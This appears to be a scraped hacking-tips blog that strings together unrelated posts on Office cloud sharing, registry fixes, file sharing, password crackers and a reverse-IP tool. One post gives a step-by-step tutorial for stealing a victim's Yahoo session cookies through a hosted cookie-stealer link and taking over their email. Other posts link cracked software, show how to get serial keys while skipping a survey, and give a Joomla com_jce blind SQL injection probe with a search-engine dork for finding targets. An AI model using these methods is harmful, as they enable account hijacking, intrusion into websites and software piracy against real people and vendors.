Google Cloud Connect for Microsoft office – Share, backup & simultaneously edit Documents

Google Cloud Connect for Microsoft office – Share, backup & simultaneously edit Documents

Imagine you are on a weekend working on your Powerpoint Presentation and just want your Group members to edit or Review it. What would you do ? Probably save the file on your disk, then attach it to your email and send it. And then again you download the edited attachments, Review it, Modify your original copy, etc. Google Cloud Connect helps you to eliminate these steps and enables you to share your files easily with your friends over Cloud, backup, and simultaneously edit you Microsoft Word, PowerPoint, and Excel documents with coworkers.

Though these features are available in Google Docs and other cloud based apps, many people are still tied to desktop applications and Google Cloud Connect is exclusively for Microsoft office users. Google Cloud Connect is a Plugin for Microsoft office that allows you to share your Microsoft office files simultaneously with your Friends. Watch the videos below:

Download Link: http://tools.google.com/dlpage/cloudconnect

How to Enable Registry disabled by Administrator

Hello friends, today i will explain you the solution of very common problem that usually users face i.e whenever you try to open registry editor you get an error message "Registry has been disabled by Your Administrator". It's a very common problem and its solution is also quite simple if you know playing with registry. My main motive is not to provide or directly feed you the solution. I want that you should explore the things. So Let's explore the registry... 

Enable Registry Disabled by Administrator

 

What is Registry?

The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. It contains settings for low-level operating system components as well as the applications running on the platform: the kernel, device drivers, services, SAM, user interface and third party applications all make use of the registry. The registry also provides a means to access counters for profiling system performance.

I know most of you know that registry is called the "BRAIN OF WINDOWS" which store all the information in form of registry keys or technically we call them DWORD or STRING or BINARY or MULTI-STRING values which stores the data into the data in the form the name suggests. 

How to enable the Registry disabled by Administrator?

The following message usually displayed when your system is infected by some virus that changes the registry value and hence you get an error message displaying " Registry is disable by Admin". So to fix it you also have to edit the registry but since your registry has been disabled so you cannot directly access it. For this you need to create one registry file that will update the dword value into the registry database.

Steps to enable registry:

1. Open the Notepad.

2. Copy the below code and paste into the notepad.

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

3. Now save the Notepad file as "anything.reg"(without quotes) and remember to select the file type as all files while saving otherwise you will not been able to execute it.

4. Now Close the file and open by double click on file and then click ok.

How to Do it using GPEDIT.MSC

Just follow this: 
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Disabled 

That's all the simple hack to Enable the Registry disabled by Administrator. Isn't that simple...

Hack email accounts or passwords using session cookies

Hi friends, welcome back in becomehacking today i will explain you how to hack email accounts and passwords of almost each and every website usingsession cookies. In my previous article i have explained you aboutsession hijacking. Today i will show you the practical implementation of session hijacking that how can we take over others sessions and hack his email accounts and other website passwords. In this tutorial of hacking email accounts using session cookies, i will explain you with the help of yahoo account. I will tell you how to hack yahoo account using session cookies.

What are Session Cookies or Magic Cookie or Session ID?

Lets discuss this in very simple language, Whenever we login in our account, it generates a unique string that contains the path of automatic login for particular time then after that limited time it expires by itself.
Note its life is only up to when your web browser is open. If you close your web browser it will be get deleted(Its latest up gradation in cookie's field for providing more security). 
Now this unique string or simply called Magic cookie is stored at two places first copy is stored on server(of which we cannot do anything) and second is stored in our web browser in form of cookie. 
This cookie is destroyed by three ways first is when you close your web browser, second is when you sign out of your account and third is if you left your account open for more than 20 minutes idle. 

How to access the cookies on local system?

As i am explaining this tutorial for hacking yahoo email account. So in your web browser just open yahoo.com and login into your account.
After that type the below code exactly and then press enter: 

javascript:alert(document.cookie);

Now a popup box will appear showing the cookies something like this:

Now create one fake account on yahoo.com and login in that account and retrieve the cookie in same manner and notice the changes in session ID's. 


For hacking the session cookies we first need the session cookies of the victim and its quite simple to get the session cookies of the victim. You just need to send him one link as soon as he clicks on that we will get his session cookie. 


After hacking the session cookies, we can use stolen session cookie to login into victim's account even without providing username and password as i already explained that session hacking removes the authentication on the server as we have the AUTO LOGIN cookie. In this type of attack when victim sign out , then hacker will also sign out. But in case of YAHOO its little bit different, when victim signout but attacker still have the access to his account. Yahoo maintains the session for 24 hours and then destroy the session ID's from its server. 

How to Steal the Session Cookies?

1. Go to the Website and register there:

http://www.my3gb.com/register.jsp

2. Download the Cookie stealer files:

http://www.megaupload.com/?d=R1802HIE

3. Now upload the four files on the website and create one empty directory naming Cookies as shown below:

4. Now Send the link of yahoo.php to victim. Now what will happen when user clicks on the yahoo.php is that its cookies are get stored into directory Cookies and simultaneously he is redirected to his account.

5. Now open the link Hacked.PHP to access the cookies. In my files the password is "explore". You need to put that to access the files.

6. You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

In my next article, I will explain you how to decode the cookies. In this tutorial you will get the cookies only which are in encypted form. You will be able to login but you will not know what information it contains

Increase your DSL modem speed by upto 50%

This is a Simple Trick to Basically increase your DSL modem internet speed. I have even attached proofs of the increase in the speed.!!! Many people think that the Internet speed cannot be improved with softwares, but here is a software which could prove them wrong..!!!!


Tool needed:
DSL Speed 4.6 (Cracked version): mediafire
[or]
DSL Speed 6.6 (Latest Version but not Cracked): mediafire

Steps:

Check your DSL Internet speed at : http://www.speedtest.net

note down the ping and download speed.

1. Install the DSL-Speed 4.6 and apply the key.
2. Go to Advanced Optimize in the left sidebar.
3. Click edit, in Online Best MTU verify.
4. edit any one of the proxy to http://www.google.com, and press OK.
5. Select the http://www.google.com in the verify site, and press start.
6. After it has detected the Best MTU, press the PROCESS button below.
7. reboot (restart)

Now, check ur internet speed at the same site given above.

DONE !!!! Your internet speed should be increased upto 50%.

if ur not satisfied with the results.. then try installing the latest DSL-speed 6.6 and do a normal optimize.!!!


Proof:

before optimization:



after optimization:



Please Note:
DSL Speed is for DSL PPPOE only and does not support the PPPOA nor does it support modem dialup networking. DSL Speed is a program that helps you optimize your DSL connection speed.


Requirements: ( Dont worry too much on this.. Just give it a try anyway )
· TCP / IP Networking installed and bound to one or more network adapters
· Windows Sockets 2.0
· PPPOE

Get free serials

First off, go to http://www.youserials.com/ and use the search button to search for the program you want.

Then click on the program you want ( i would pick the program with the best % of working)

then it should come up with a survey, don't click the survey!!
Copy this url somewhere, (EXAMPLE:http://www.youserials.com/serial/windows-7-genuine-100/190523)
Copy the last 6 digits of the url, like in this example they are (190523).
The copy the last 6 digits into a notepad or somewhere you can copy and paste back.
Open a new window in your internet browser, copy and past this in there
http://youserials.com/jq_serial.php?id=

at the end of that url post the last 6 digits and it will come up with a key!!
If it doesn't come up then it will be re-directing you to a place where they have put the filE!!!

Easily Share Large Files Directly Pc 2 Pc Using WebBrowser Without Uploading Anywhere

Easily Share Large Files Directly PC To PC Using Web Browser Without Uploading Anywhere



FilesOverMiles is a tool for direct file sharing, fast and secure way to send files over the Internet. No setup or sign up and the file transfers are not stored anywhere. It will appeal to many professionals who want to share files securely and efficiently.

Step 1 : Go to FilesOverMiles website. Click "Browse" and select the file to transfer.



Step 2 : As soon as you select the file, the site will generate an unique URL which you have to share with the user to want to send the file to.



Step 3 (2nd User) : The PC on the receiving end of this file transfer must go this unique url which will show a download option from the file to be transferred PC to PC



Note : The transfer file will continue to be available for download until the web page on 1st user’s browser is closed.

This way you can securely transfer files of any size through one pc to another from your browser. No need to upload anywhere.

Enjoy..

Domain Reverse IP Lookup : DRIL

http://sourceforge.net/projects/dril/files/dril2.2v/DomainReverseIPLookup.jar/downloadDRIL ( Domain Reverse IP Lookup ) Tool is a Reverse Domain Tool that will really useful for penetration testers to find out the domain names which are listed in the the target host, DRIL is a GUI, JAVA based application which use the Bing API key.DRIL has a simple user friendly which will be helpfull for penetration tester to do there work fast without a mess .this is only tested on linux still , been java it should work on windows to.

There are online tools available, But many times due to slow internet connectivity we intend to get frustrated while audits. this tool is small and handy will not consume harddisk space So, its simply an good and fast altenative.
How to run DRIL

java -jar
example
java -jar “/home/treasure/DomainReverseIPLookup.jar”
and it should open the application
Download DRIL here

joomlacontenteditor (com_jce) BLIND sql injection vulnerability

 joomlacontenteditor (com_jce) BLIND sql injection vulnerability
================================================
  
Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  BLind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
  
  
==============================================================
Description:

JCE makes creating and editing Joomla!® content easy Add a set of tools to your 

Joomla!® environment that give you the power to create the kind of content you want,

without limitations, and without needing to know or learn HTML, XHTML, CSS... 

==============================================================

    exploit & p0c
  
[!] index.php?option=com_jce&Itemid=[valid Itemid]
  
    Example p0c
  
[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False
  
  
==============================================================
  
    Nothing Impossible In This World Even Nobody`s Perfect
  
============================================================

Hacking Tool: John the Ripper: Crack Password

Re: Hacking Tool: John the Ripper

• It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free
• The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.